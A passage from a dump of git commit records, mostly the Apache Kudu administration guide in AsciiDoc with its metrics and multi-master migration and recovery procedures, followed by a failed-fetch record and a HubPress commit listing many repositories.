--fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir` and\n `fs_data_dirs` configuration parameter. 
Please note if you've set fs_data_dirs to some directories\n other than the value of fs_wal_dir, it should be explicitly included in every command below where\n fs_wal_dir is also included.\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_data_dir> <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. Use the following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir> --uuid=<uuid>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master --uuid=80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <reference_master>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master and must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Reconfigure the DNS alias for the dead master to point at the replacement master.\n\n. Start the replacement master.\n\n. Restart the existing live masters. This results in a brief availability outage, but it should\n last only as long as it takes for the masters to come back up.\n\nCongratulations, the dead master has been replaced! To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. 
Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n","old_contents":"\/\/ Licensed to the Apache Software Foundation (ASF) under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ASF licenses this file\n\/\/ to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n[[administration]]\n= Apache Kudu Administration\n\n:author: Kudu Team\n:imagesdir: .\/images\n:icons: font\n:toc: left\n:toclevels: 3\n:doctype: book\n:backend: html5\n:sectlinks:\n:experimental:\n\nNOTE: Kudu is easier to manage with link:http:\/\/www.cloudera.com\/content\/www\/en-us\/products\/cloudera-manager.html[Cloudera Manager]\nthan in a standalone installation. See Cloudera's\nlink:http:\/\/www.cloudera.com\/content\/www\/en-us\/documentation\/betas\/kudu\/latest\/topics\/kudu_installation.html[Kudu documentation]\nfor more details about using Kudu with Cloudera Manager.\n\n== Starting and Stopping Kudu Processes\n\nNOTE: These instructions are relevant only when Kudu is installed using operating system packages\n(e.g. `rpm` or `deb`).\n\ninclude::installation.adoc[tags=start_stop]\n\n== Kudu Web Interfaces\n\nKudu tablet servers and masters expose useful operational information on a built-in web interface,\n\n=== Kudu Master Web Interface\n\nKudu master processes serve their web interface on port 8051. The interface exposes several pages\nwith information about the cluster state:\n\n- A list of tablet servers, their host names, and the time of their last heartbeat.\n- A list of tables, including schema and tablet location information for each.\n- SQL code which you can paste into Impala Shell to add an existing table to Impala's list of known data sources.\n\n=== Kudu Tablet Server Web Interface\n\nEach tablet server serves a web interface on port 8050. The interface exposes information\nabout each tablet hosted on the server, its current state, and debugging information\nabout maintenance background operations.\n\n=== Common Web Interface Pages\n\nBoth Kudu masters and tablet servers expose a common set of information via their web interfaces:\n\n- HTTP access to server logs.\n- an `\/rpcz` endpoint which lists currently running RPCs via JSON.\n- pages giving an overview and detailed information on the memory usage of different\n components of the process.\n- information on the current set of configuration flags.\n- information on the currently running threads and their resource consumption.\n- a JSON endpoint exposing metrics about the server.\n- information on the deployed version number of the daemon.\n\nThese interfaces are linked from the landing page of each daemon's web UI.\n\n== Kudu Metrics\n\nKudu daemons expose a large number of metrics. 
Some metrics are associated with an entire\nserver process, whereas others are associated with a particular tablet replica.\n\n=== Listing available metrics\n\nThe full set of available metrics for a Kudu server can be dumped via a special command\nline flag:\n\n[source,bash]\n----\n$ kudu-tserver --dump_metrics_json\n$ kudu-master --dump_metrics_json\n----\n\nThis will output a large JSON document. Each metric indicates its name, label, description,\nunits, and type. Because the output is JSON-formatted, this information can easily be\nparsed and fed into other tooling which collects metrics from Kudu servers.\n\n=== Collecting metrics via HTTP\n\nMetrics can be collected from a server process via its HTTP interface by visiting\n`\/metrics`. The output of this page is JSON for easy parsing by monitoring services.\nThis endpoint accepts several `GET` parameters in its query string:\n\n- `\/metrics?metrics=<substring1>,<substring2>,...` - limits the returned metrics to those which contain\nat least one of the provided substrings. The substrings also match entity names, so this\nmay be used to collect metrics for a specific tablet.\n\n- `\/metrics?include_schema=1` - includes metrics schema information such as unit, description,\nand label in the JSON output. This information is typically elided to save space.\n\n- `\/metrics?compact=1` - eliminates unnecessary whitespace from the resulting JSON, which can decrease\nbandwidth when fetching this page from a remote host.\n\n- `\/metrics?include_raw_histograms=1` - include the raw buckets and values for histogram metrics,\nenabling accurate aggregation of percentile metrics over time and across hosts.\n\nFor example:\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?include_schema=1&metrics=connections_accepted'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"server\",\n \"id\": \"kudu.tabletserver\",\n \"attributes\": {},\n \"metrics\": [\n {\n \"name\": \"rpc_connections_accepted\",\n \"label\": \"RPC Connections Accepted\",\n \"type\": \"counter\",\n \"unit\": \"connections\",\n \"description\": \"Number of incoming TCP connections made to the RPC server\",\n \"value\": 92\n }\n ]\n }\n]\n----\n\n[source,bash]\n----\n$ curl -s 'http:\/\/example-ts:8050\/metrics?metrics=log_append_latency'\n----\n\n[source,json]\n----\n[\n {\n \"type\": \"tablet\",\n \"id\": \"c0ebf9fef1b847e2a83c7bd35c2056b1\",\n \"attributes\": {\n \"table_name\": \"lineitem\",\n \"partition\": \"hash buckets: (55), range: [(<start>), (<end>))\",\n \"table_id\": \"\"\n },\n \"metrics\": [\n {\n \"name\": \"log_append_latency\",\n \"total_count\": 7498,\n \"min\": 4,\n \"mean\": 69.3649,\n \"percentile_75\": 29,\n \"percentile_95\": 38,\n \"percentile_99\": 45,\n \"percentile_99_9\": 95,\n \"percentile_99_99\": 167,\n \"max\": 367244,\n \"total_sum\": 520098\n }\n ]\n }\n]\n----\n\nNOTE: All histograms and counters are measured since the server start time, and are not reset upon collection.\n\n=== Collecting metrics to a log\n\nKudu may be configured to periodically dump all of its metrics to a local log file using the\n`--metrics_log_interval_ms` flag. Set this flag to the interval at which metrics should be written\nto a log file.\n\nThe metrics log will be written to the same directory as the other Kudu log files, with the same\nnaming format. After any metrics log file reaches 64MB uncompressed, the log will be rolled and\nthe previous file will be gzip-compressed.\n\nThe log file generated has three space-separated fields. 
The first field is the word\n`metrics`. The second field is the current timestamp in microseconds since the Unix epoch.\nThe third is the current value of all metrics on the server, using a compact JSON encoding.\nThe encoding is the same as the metrics fetched via HTTP described above.\n\nWARNING: Although metrics logging automatically rolls and compresses previous log files, it does\nnot remove old ones. Since metrics logging can use significant amounts of disk space,\nconsider setting up a system utility to monitor space in the log directory and archive or\ndelete old segments.\n\n== Common Kudu workflows\n\n[[migrate_to_multi_master]]\n=== Migrating to Multiple Kudu Masters\n\nFor high availability and to avoid a single point of failure, Kudu clusters should be created with\nmultiple masters. Many Kudu clusters were created with just a single master, either for simplicity\nor because Kudu multi-master support was still experimental at the time. This workflow demonstrates\nhow to migrate to a multi-master configuration.\n\nWARNING: The workflow is unsafe for adding new masters to an existing multi-master configuration.\nDo not use it for that purpose.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the migration\n\n. Establish a maintenance window (one hour should be sufficient). During this time the Kudu cluster\n will be unavailable.\n\n. Decide how many masters to use. The number of masters should be odd. Three or five node master\n configurations are recommendeded; they can tolerate one or two failures respectively.\n\n. Perform the following preparatory steps for the existing master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir`\n configuration parameter.\n* Identify and record the port the master is using for RPCs. The default port value is 7051, but it\n may have been customized using the `rpc_bind_addresses` configuration parameter.\n* Identify the master's UUID. It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: existing master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n4aab798a69e94fab8d77069edff28ce0\n----\n+\n* Optional: configure a DNS alias for the master. The alias could be a DNS cname (if the machine\n already has an A record in DNS), an A record (if the machine is only known by its IP address),\n or an alias in \/etc\/hosts. The alias should be an abstract representation of the master (e.g.\n `master-1`).\n+\nWARNING: Without DNS aliases it is not possible to recover from permanent master failures, and as\nsuch it is highly recommended.\n+\n. Perform the following preparatory steps for each new master:\n* Choose an unused machine in the cluster. 
The master generates very little load so it can be\n colocated with other data services or load-generating processes, though not with another Kudu\n master from the same configuration.\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n* Choose and record the port the master should use for RPCs.\n* Optional: configure a DNS alias for the master (e.g. `master-2`, `master-3`, etc).\n\n==== Perform the migration\n\n. Stop all the Kudu processes in the entire cluster.\n\n. Format the data directory on each new master machine, and record the generated UUID. Use the\n following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir>\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\nf5624e05f40649b79a757629a69d061e\n----\n\n. If using CM, add the new Kudu master roles now, but do not start them.\n* If using DNS aliases, override the empty value of the `Master Address` parameter for each role\n (including the existing master role) with that master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Rewrite the master's Raft configuration with the following command, executed on the existing\n master machine:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=<master_data_dir> <tablet_id> <all_masters>\n----\n+\nmaster_data_dir:: existing master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nall_masters:: space-separated list of masters, both new and existing. Each entry in the list must be\n a string of the form `<uuid>:<hostname>:<port>`\nuuid::: master's previously recorded UUID\nhostname::: master's previously recorded hostname or alias\nport::: master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta rewrite_raft_config --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 4aab798a69e94fab8d77069edff28ce0:master-1:7051 f5624e05f40649b79a757629a69d061e:master-2:7051 988d8ac6530f426cbe180be5ba52033d:master-3:7051\n----\n\n. Start the existing master.\n\n. Copy the master data to each new master with the following command, executed on each new master\n machine:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <existing_master>\n----\n+\nmaster_data_dir:: new master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nexisting_master:: RPC address of the existing master and must be a string of the form\n`<hostname>:<port>`\nhostname::: existing master's previously recorded hostname or alias\nport::: existing master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-1:7051\n----\n\n. Start all of the new masters.\n+\nWARNING: Skip the next step if using CM.\n+\n. 
Modify the value of the `tserver_master_addrs` configuration parameter for each tablet server.\n The new value must be a comma-separated list of masters where each entry is a string of the form\n `<hostname>:<port>`\nhostname:: master's previously recorded hostname or alias\nport:: master's previously recorded RPC port number\n\n. Start all of the tablet servers.\n\nCongratulations, the cluster has now been migrated to multiple masters! To verify that all masters\nare working properly, consider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n\n=== Recovering from a dead Kudu Master in a Multi-Master Deployment\n\nKudu multi-master deployments function normally in the event of a master loss. However, it is\nimportant to replace the dead master; otherwise a second failure may lead to a loss of availability,\ndepending on the number of available masters. This workflow describes how to replace the dead\nmaster.\n\nDue to https:\/\/issues.apache.org\/jira\/browse\/KUDU-1620[KUDU-1620], it is not possible to perform\nthis workflow without also restarting the live masters. As such, the workflow requires a\nmaintenance window, albeit a brief one as masters generally restart quickly.\n\nWARNING: Kudu does not yet support Raft configuration changes for masters. As such, it is only\npossible to replace a master if the deployment was created with DNS aliases. See the\n<<migrate_to_multi_master,multi-master migration workflow>> for more details.\n\nWARNING: The workflow presupposes at least basic familiarity with Kudu configuration management. If\nusing Cloudera Manager (CM), the workflow also presupposes familiarity with it.\n\nWARNING: All of the command line steps below should be executed as the Kudu UNIX user, typically\n`kudu`.\n\n==== Prepare for the recovery\n\n. Ensure that the dead master is well and truly dead. Take whatever steps needed to prevent it from\n accidentally restarting; this can be quite dangerous for the cluster post-recovery.\n\n. Choose one of the remaining live masters to serve as a basis for recovery. The rest of this\n workflow will refer to this master as the \"reference\" master.\n\n. Choose an unused machine in the cluster where the new master will live. The master generates very\n little load so it can be colocated with other data services or load-generating processes, though\n not with another Kudu master from the same configuration. The rest of this workflow will refer to\n this master as the \"replacement\" master.\n\n. Perform the following preparatory steps for the replacement master:\n* Ensure Kudu is installed on the machine, either via system packages (in which case the `kudu` and\n `kudu-master` packages should be installed), or via some other means.\n* Choose and record the directory where the master's data will live.\n\n. Perform the following preparatory steps for each live master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir`\n configuration parameter.\n* Identify and record the master's UUID. 
It can be fetched using the following command:\n+\n[source,bash]\n----\n$ kudu fs dump uuid --fs_wal_dir=<master_data_dir> 2>\/dev\/null\n----\nmaster_data_dir:: live master's previously recorded data directory\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs dump uuid --fs_wal_dir=\/var\/lib\/kudu\/master 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Perform the following preparatory steps for the reference master:\n* Identify and record the directory where the master's data lives. If using Kudu system packages,\n the default value is \/var\/lib\/kudu\/master, but it may be customized via the `fs_wal_dir`\n configuration parameter.\n* Identify and record the UUIDs of every master in the cluster, using the following command:\n+\n[source,bash]\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=<master_data_dir> <tablet_id> 2>\/dev\/null\n----\nmaster_data_dir:: reference master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica cmeta print_replica_uuids --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 2>\/dev\/null\n80a82c4b8a9f4c819bab744927ad765c 2a73eeee5d47413981d9a1c637cce170 1c3f3094256347528d02ec107466aef3\n----\n+\n. Using the two previously-recorded lists of UUIDs (one for all live masters and one for all\n masters), determine and record (by process of elimination) the UUID of the dead master.\n\n==== Perform the recovery\n\n. Format the data directory on the replacement master machine using the previously recorded\n UUID of the dead master. Use the following command sequence:\n+\n[source,bash]\n----\n$ kudu fs format --fs_wal_dir=<master_data_dir> --uuid=<uuid>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\nuuid:: dead master's previously recorded UUID\n+\n[source,bash]\nExample::\n+\n----\n$ kudu fs format --fs_wal_dir=\/var\/lib\/kudu\/master --uuid=80a82c4b8a9f4c819bab744927ad765c\n----\n+\n. Copy the master data to the replacement master with the following command:\n+\n[source,bash]\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=<master_data_dir> <tablet_id> <reference_master>\n----\n+\nmaster_data_dir:: replacement master's previously recorded data directory\ntablet_id:: must be the string `00000000000000000000000000000000`\nreference_master:: RPC address of the reference master and must be a string of the form\n`<hostname>:<port>`\nhostname::: reference master's previously recorded hostname or alias\nport::: reference master's previously recorded RPC port number\n+\n[source,bash]\nExample::\n+\n----\n$ kudu local_replica copy_from_remote --fs_wal_dir=\/var\/lib\/kudu\/master 00000000000000000000000000000000 master-2:7051\n----\n+\n. If using CM, add the replacement Kudu master role now, but do not start it.\n* Override the empty value of the `Master Address` parameter for the new role with the replacement\n master's alias.\n* Add the port number (separated by a colon) if using a non-default RPC port value.\n\n. Reconfigure the DNS alias for the dead master to point at the replacement master.\n\n. Start the replacement master.\n\n. Restart the existing live masters. This results in a brief availability outage, but it should\n last only as long as it takes for the masters to come back up.\n\nCongratulations, the dead master has been replaced! 
To verify that all masters are working properly,\nconsider performing the following sanity checks:\n\n* Using a browser, visit each master's web UI. Look at the \/masters page. All of the masters should\n be listed there with one master in the LEADER role and the others in the FOLLOWER role. The\n contents of \/masters on each master should be the same.\n\n* Run a Kudu system check (ksck) on the cluster using the `kudu` command line tool. Help for ksck\n can be viewed via `kudu cluster ksck --help`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"f1049709ef62852561be0f5302f976627f39a502","subject":"Python note - 
pip install inside Python","message":"Python note - pip install inside Python\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"75a847bee6b7af60b71769c27723be71ab966a6a","subject":"Added Troubleshooting Step About Local Database","message":"Added Troubleshooting Step About Local Database\n\nI found out that in https:\/\/github.com\/HubPress\/hubpress.io\/issues\/87, you can only resync HubPress on Mobile if you clear app data and cache. This addition may help others with the same issue, until a more permanent fix can be implemented.","repos":"popurax\/popurax.github.io,ImpossibleBlog\/impossibleblog.github.io,2wce\/2wce.github.io,fasigpt\/fasigpt.github.io,cringler\/cringler.github.io,pdudits\/pdudits.github.io,der3k\/der3k.github.io,joaquinlpereyra\/joaquinlpereyra.github.io,wheeliz\/tech-blog,yysk\/yysk.github.io,euprogramador\/euprogramador.github.io,kr-b\/kr-b.github.io,dbect\/dbect.github.io,scholzi94\/scholzi94.github.io,Ardemius\/ardemius.github.io,laura-arreola\/laura-arreola.github.io,OctavioMaia\/octaviomaia.github.io,SingularityMatrix\/SingularityMatrix.github.io,theofilis\/theofilis.github.io,scottellis64\/scottellis64.github.io,javathought\/javathought.github.io,ComradeCookie\/comradecookie.github.io,fqure\/fqure.github.io,minicz\/minicz.github.io,deunz\/deunz.github.io,hami-jp\/hami-jp.github.io,Olika120\/Olika120.github.io,lovian\/lovian.github.io,sinemaga\/sinemaga.github.io,raghakot\/raghakot.github.io,ashmckenzie\/ashmckenzie.github.io,miroque\/shirokuma,coder-ze\/coder-ze.github.io,osada9000\/osada9000.github.io,ntfnd\/ntfnd.github.io,laura-arreola\/laura-arreola.github.io,gsera\/gsera.github.io,theofilis\/theofilis.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,soyabeen\/soyabeen.github.io,PertuyF\/PertuyF.github.io,buliaoyin\/buliaoyin.github.io,birvajoshi\/birvajoshi.github.io,Ugotsta\/Ugotsta.github.io,stay-india\/stay-india.github.io,zakkum42\/zakkum42.github.io,Akanoa\/akanoa.github.io,nobodysplace\/nobodysplace.github.io,olivierbellone\/olivierbellone.github.io,siarlex\/siarlex.github.io,SingularityMatrix\/SingularityMatrix.github.io,theblankpages\/theblankpages.github.io,smirnoffs\/smirnoffs.github.io,cringler\/cringler.github.io,indusbox\/indusbox.github.io,KlimMalgin\/klimmalgin.github.io,reversergeek\/reversergeek.github.io,Tekl\/tekl.github.io,mrcouthy\/mrcouthy.github.io,Arttii\/arttii.github.io,neocarvajal\/neocarvajal.github.io,ElteHupkes\/eltehupkes.github.io,datumrich\/datumrich.github.io,djmdata\/djmdata.github.io,christianmtr\/christianmtr.github.io,davehardy20\/davehardy20.github.io,Dhuck\/dhuck.github.io,deunz\/deunz.github.io,doochik\/doochik.github.io,Olika120\/Olika120.github.io,sebbrousse\/sebbrousse.github.io,ghostbind\/ghostbind.github.io,rlebron88\/rlebron88.github.io,Easter-Egg\/Easter-Egg.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,heliomsolivas\/heliomsolivas.github.io,reversergeek\/reversergeek.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,velo\/velo.github.io,chbailly\/chbailly.github.io,netrunnerX\/netrunnerx.github.io,patricekrakow\/patricekrakow.github.io,thykka\/thykka.github.io,hayyuelha\/technical-blog,rishipatel\/rishipatel.github.io,dgrizzla\/dgrizzla.github.io,devopSkill\/devopskill.github.io,jcsirot\/hubpress.i
o,bbsome\/bbsome.github.io,ThibaudL\/thibaudl.github.io,lovian\/lovian.github.io,thykka\/thykka.github.io,iesextremadura\/iesextremadura.github.io,in2erval\/in2erval.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,mozillahonduras\/mozillahonduras.github.io,livehua\/livehua.github.io,djengineerllc\/djengineerllc.github.io,Mentaxification\/Mentaxification.github.io,hbbalfred\/hbbalfred.github.io,Olika120\/Olika120.github.io,demo-hubpress\/demo,silviu\/silviu.github.io,vendanoapp\/vendanoapp.github.io,locnh\/locnh.github.io,uzuyh\/hubpress.io,murilo140891\/murilo140891.github.io,cringler\/cringler.github.io,elenampva\/elenampva.github.io,noahrc\/noahrc.github.io,fadlee\/fadlee.github.io,alexbleasdale\/alexbleasdale.github.io,laura-arreola\/laura-arreola.github.io,Kif11\/Kif11.github.io,speedcom\/hubpress.io,ioisup\/ioisup.github.io,caryfitzhugh\/caryfitzhugh.github.io,zakkum42\/zakkum42.github.io,fraslo\/fraslo.github.io,lmcro\/hubpress.io,jivank\/jivank.github.io,Brzhk\/Brzhk.github.io,sinemaga\/sinemaga.github.io,sitexa\/hubpress.io,lxjk\/lxjk.github.io,elenampva\/elenampva.github.io,peter-lawrey\/peter-lawrey.github.io,uskithub\/uskithub.github.io,ntfnd\/ntfnd.github.io,xurei\/xurei.github.io,djmdata\/djmdata.github.io,buliaoyin\/buliaoyin.github.io,faldah\/faldah.github.io,bbsome\/bbsome.github.io,doochik\/doochik.github.io,royston\/hubpress.io,matthewbadeau\/matthewbadeau.github.io,SingularityMatrix\/SingularityMatrix.github.io,harquail\/harquail.github.io,bahamoth\/bahamoth.github.io,hitamutable\/hitamutable.github.io,lyqiangmny\/lyqiangmny.github.io,thomaszahr\/thomaszahr.github.io,TinkeringAlways\/tinkeringalways.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,jbutzprojects\/jbutzprojects.github.io,amuhle\/amuhle.github.io,neurodiversitas\/neurodiversitas.github.io,never-ask-never-know\/never-ask-never-know.github.io,milantracy\/milantracy.github.io,endymion64\/VinJBlog,ashmckenzie\/ashmckenzie.github.io,dfmooreqqq\/dfmooreqqq.github.io,hubsaysnuaa\/hubsaysnuaa.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,kr-b\/kr-b.github.io,ThomasLT\/thomaslt.github.io,mkaptein172\/mkaptein172.github.io,zestyroxy\/zestyroxy.github.io,raytong82\/raytong82.github.io,justafool5\/justafool5.github.io,metasean\/blog,rizalp\/rizalp.github.io,FSUgenomics\/hubpress.io,FRC125\/FRC125.github.io,GDGSriLanka\/blog,mkhymohamed\/mkhymohamed.github.io,ekroon\/ekroon.github.io,joelcbailey\/joelcbailey.github.io,laposheureux\/laposheureux.github.io,LearningTools\/LearningTools.github.io,thomasgwills\/thomasgwills.github.io,realraindust\/realraindust.github.io,sskorol\/sskorol.github.io,hirako2000\/hirako2000.github.io,miroque\/shirokuma,patricekrakow\/patricekrakow.github.io,iamthinkking\/iamthinkking.github.io,heliomsolivas\/heliomsolivas.github.io,darkfirenze\/darkfirenze.github.io,InformatiQ\/informatiq.github.io,hytgbn\/hytgbn.github.io,fabself\/fabself.github.io,yuyudhan\/yuyudhan.github.io,SBozhko\/sbozhko.github.io,buliaoyin\/buliaoyin.github.io,expelled\/expelled.github.io,fundstuecke\/fundstuecke.github.io,debbiezhu\/debbiezhu.github.io,cothan\/cothan.github.io,acristyy\/acristyy.github.io,tedroeloffzen\/tedroeloffzen.github.io,alexgaspard\/alexgaspard.github.io,bretonio\/bretonio.github.io,timelf123\/timelf123.github.io,lovian\/lovian.github.io,cmolitor\/blog,Fendi-project\/fendi-project.github.io,ntfnd\/ntfnd.github.io,Motsai\/old-repo-to-mirror,backemulus\/backemulus.github.io,ElteHupkes\/eltehupkes.github.io,xquery\/xquery.github.io,haxiomic\/haxiomic.github.io,juliosueiras\/juliosueiras.
github.io,Andy4Craft\/andy4craft.github.io,bitcowboy\/bitcowboy.github.io,simevidas\/simevidas.github.io,johnkellden\/github.io,kosssi\/blog,cloudmind7\/cloudmind7.github.com,flipswitchingmonkey\/flipswitchingmonkey.github.io,nnn-dev\/nnn-dev.github.io,flavienliger\/flavienliger.github.io,wushaobo\/wushaobo.github.io,kay\/kay.github.io,blackgun\/blackgun.github.io,ecmeyva\/ecmeyva.github.io,Brandywine2161\/hubpress.io,yeddiyarim\/yeddiyarim.github.io,vba\/vba.github.io,Le6ow5k1\/le6ow5k1.github.io,acien101\/acien101.github.io,sebasmonia\/sebasmonia.github.io,ThomasLT\/thomaslt.github.io,suning-wireless\/Suning-Wireless.github.io,alexgaspard\/alexgaspard.github.io,flavienliger\/flavienliger.github.io,demo-hubpress\/demo,izziiyt\/izziiyt.github.io,deformat\/deformat.github.io,scholzi94\/scholzi94.github.io,heliomsolivas\/heliomsolivas.github.io,sidmusa\/sidmusa.github.io,royston\/hubpress.io,thezorgan\/thezorgan.github.io,sandersky\/sandersky.github.io,diogoan\/diogoan.github.io,BulutKAYA\/bulutkaya.github.io,camilo28\/camilo28.github.io,ricardozanini\/ricardozanini.github.io,tosun-si\/tosun-si.github.io,macchandev\/macchandev.github.io,3991\/3991.github.io,bretonio\/bretonio.github.io,CreditCardsCom\/creditcardscom.github.io,rpwolff\/rpwolff.github.io,wols\/time,sanglt\/sanglt.github.io,mattbarton\/mattbarton.github.io,tedbergeron\/hubpress.io,neomobil\/neomobil.github.io,icthieves\/icthieves.github.io,Murazaki\/murazaki.github.io,evolgenomology\/evolgenomology.github.io,Dekken\/dekken.github.io,pzmarzly\/g2zory,drleidig\/drleidig.github.io,LihuaWu\/lihuawu.github.io,hirako2000\/hirako2000.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,demohi\/blog,anggadjava\/anggadjava.github.io,fraslo\/fraslo.github.io,jblemee\/jblemee.github.io,blogforfun\/blogforfun.github.io,PertuyF\/PertuyF.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,sitexa\/hubpress.io,tomas\/tomas.github.io,duarte-fonseca\/duarte-fonseca.github.io,Roen00\/roen00.github.io,CarlosRPO\/carlosrpo.github.io,chaseconey\/chaseconey.github.io,locnh\/locnh.github.io,ca13\/hubpress.io,amodig\/amodig.github.io,wols\/time,jankolorenc\/jankolorenc.github.io,KurtStam\/kurtstam.github.io,bretonio\/bretonio.github.io,chakbun\/chakbun.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,LihuaWu\/lihuawu.github.io,elidiazgt\/mind,rdspring1\/rdspring1.github.io,wattsap\/wattsap.github.io,GWCATT\/gwcatt.github.io,uzuyh\/hubpress.